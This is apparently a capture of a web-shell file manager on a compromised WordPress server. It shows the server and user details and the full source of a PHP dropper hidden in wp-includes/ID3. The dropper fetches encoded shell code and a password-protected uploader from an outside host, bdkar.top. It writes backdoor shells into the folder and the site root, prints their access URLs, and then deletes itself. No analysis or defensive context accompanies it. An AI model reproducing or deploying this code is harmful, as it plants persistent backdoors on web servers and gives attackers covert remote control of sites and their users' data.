HEX
Server: LiteSpeed
System: Linux box401.parsvds.com 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64
User: iymdjwzl (2335)
PHP: 7.4.33
Disabled: exec,shell_exec,system,passthru,popen,eval,proc_close,proc_open,pcntl_exec,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_getpriority,pcntl_setpriority
$ pwd: /home/iymdjwzl/public_html/wp-includes/ID3/
Upload Files
File: /home/iymdjwzl/public_html/wp-includes/ID3/yeydwvrkdm.php
<?php
# 383634
$shell_encrypted = curl('https://bdkar.top/shl/fox-bdkr-shel.txt');
$shell = base64_decode($shell_encrypted);
$link = str_replace(basename(__FILE__), '', 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']);
$file1_name = mt_rand_str(8); // Generate random name for shell
$file1 = 'BDKR28_' . $file1_name . '.php';
$file2_name = mt_rand_str(8); // Generate random name for uploader
$file2 = $file2_name . '.php';
$password = mt_rand_str(4);
$save = fopen($file1, 'w');
fwrite($save, $shell);
fclose($save);
$root_save = fopen($_SERVER['DOCUMENT_ROOT'] . '/BDKR28WP.php', 'w');
fwrite($root_save, $shell);
fclose($root_save);
$uploader = curl('https://bdkar.top/shl/uploader-pass.txt');
$uploader = str_replace('RANDOM_PASSWORD', $password, $uploader);
$save = fopen($file2, 'w');
fwrite($save, $uploader);
fclose($save);
$txt_url = "https://bdkar.top/shl/bdkr.txt";
$txt_content = curl($txt_url);
$txt_file = fopen("BDKR.txt", "w");
fwrite($txt_file, $txt_content);
fclose($txt_file);
function mt_rand_str($l, $c = 'abcdefghijklmnopqrstuvwxyz1234567890') {
    for ($s = '', $cl = strlen($c) - 1, $i = 0; $i < $l; $s .= $c[mt_rand(0, $cl)], ++$i);
    return $s;
}
function curl($url) {
    $html = file_get_contents($url);
    if (!empty($html)) {
        return $html;
    }
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_TIMEOUT, 40);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0");
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, TRUE);
    if (stristr($url, "https://")) {
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
    }
    curl_setopt($curl, CURLOPT_HEADER, false);
    return curl_exec($curl);
}
?>
<shell><font color="red"><center> Shell : <?php echo $link . $file1; ?></center></font><br></shell>
<up><font color="green"><center> Up : <?php echo $link . $file2 . '?BDKR28=' . $password; ?></center></font><br></up>
<?php
unlink(__FILE__);
@ Telegram